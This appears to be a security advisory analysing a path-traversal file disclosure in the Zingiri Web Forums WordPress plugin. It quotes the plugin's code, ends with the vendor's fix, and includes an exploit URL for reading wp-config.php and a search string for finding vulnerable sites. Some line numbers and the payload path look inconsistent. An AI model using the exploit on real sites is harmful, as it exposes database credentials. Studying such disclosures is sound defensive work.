References:
WordPress Zingiri Forums arbitrary file disclosure
http://ceriksen.com/2013/01/12/wordpress-zingiri-forums-arbitrary-file-disclosure/
Secunia Advisory SA50833
http://secunia.com/advisories/50833/

Vulnerability analysis
The Zingiri Web Forums plugin for WordPress writes out a header for the forum in forum.php by adding an action to wp_head:
44 add_action('wp_head', 'zing_forum_header');

686 function zing_forum_header()
687 {
688     global $zing_forum_content;
689     global $zing_forum_menu;
690     $output = zing_forum_output("content");
691
692     zing_integrator_cut($output, '<div id="footer">', '</div>'); // remove footer
693     zing_integrator_cut($output, '<span class="forgot_password">', '</span>');
694
695     $zing_forum_content = $output;
696
697     echo '<script type="text/javascript" language="javascript">';
698     echo "var zing_forum_url = '" . ZING_FORUM_URL . "ajax/';";
699     echo "var zing_forum_index = '" . get_option('home') . "/index.php?';";
700     echo "function zing_forum_url_ajax(s) { return zing_forum_url + s; }";
701     echo '</script>';
702
703     echo '<link rel="stylesheet" type="text/css" href="' . ZING_FORUM_URL . 'zing.css" media="screen"/>';
704 }
So on each load of the WordPress blog it will call into zing_forum_header. The first call it makes is into zing_forum_output, which is rather long. I've highlighted two areas:
456 function zing_forum_output($process) {
457     global $post, $wpdb, $zing_forum_loaded, $zing_forum_to_include, $zing_forum_mode;
458
459     $postVar = array();
460     switch ($process)
461     {
462         case "content":
463             if (isset($post)) $cf = get_post_custom($post->ID);
464             if (isset($_GET['zforum']))
465             {
466                 $zing_forum_to_include = $_GET['zforum'];
467                 $zing_forum_mode = "forum";
468             }
We can set the value of $zing_forum_to_include through the zforum GET parameter. That value is then compared in a long else-if chain. Here is the block of code that is executed if we set it to css:
541 } elseif ($zing_forum_to_include == 'css') {
542     maid();
543     if (isset($_GET['stylesheet'])) $key = $_GET['stylesheet'];
544     else $key = $_GET['url'];
545     if (isset($_SESSION['ccforum']['stylesheet'][$key])) {
546         $output = $_SESSION['ccforum']['stylesheet'][$key];
547     } else {
548         if (isset($_GET['stylesheet'])) {
549             $http = zing_forum_http("mybb", 'css.php', "");
550             $news = new zHttpRequest($http, 'zingiri-forum');
551             if (!$news->curlInstalled()) return "cURL not installed";
552             elseif (!$news->live()) return "a http Error occured";
553             $output = $news->DownloadToString();
554             $output = str_replace('url(images/', 'url(' . ZING_MYBB_URL . '/images/', $output);
555
556         } elseif ($_GET['url']) {
557             $url = $_GET['url'];
558             $output = file_get_contents(ZING_MYBB_DIR . '/cache/themes/' . $url);
559         }
560         $f[] = '/^body.*{(.*?)/';
561         $r[] = '{$1';
562         $f[] = '/.zingbody/';
563         $r[] = '';
564         $f[] = '/(.*?).{(.*?)/';
565         $r[] = '.ccforum $1 {$2';
566         $f[] = '/(.*?),(.*?).{(.*?)/';
567         $r[] = '$1,.ccforum $2 {$3';
568         $f[] = '/(.*?),(.*?),(.*?).{(.*?)/';
569         $r[] = '$1,$2,.ccforum $3 {$4';
570         $output = preg_replace($f, $r, $output, -1, $count);
571         if ($output) $_SESSION['ccforum']['stylesheet'][$key] = $output;
572     }
573     header("Content-type: text/css");
574     echo $output;
575     die();
If we leave the "stylesheet" GET parameter unset but supply the "url" GET parameter, its value is concatenated unchecked onto the themes directory and fed into the file_get_contents call on line 554. We can abuse this to disclose the contents of the wp-config.php file like this:
http://URL/wordpress/?zforum=css&url=.../wp-config.php
Google: inurl: plugins/zingsiri-forum
Solution:
Comparing version 1.4.2 with version 1.4.4, the line
557 $url = $_GET['url'];
was changed to
555 $url = str_replace('..', '', $_GET['url']);
The ".." sequence is stripped from the parameter so the path can no longer climb into parent directories.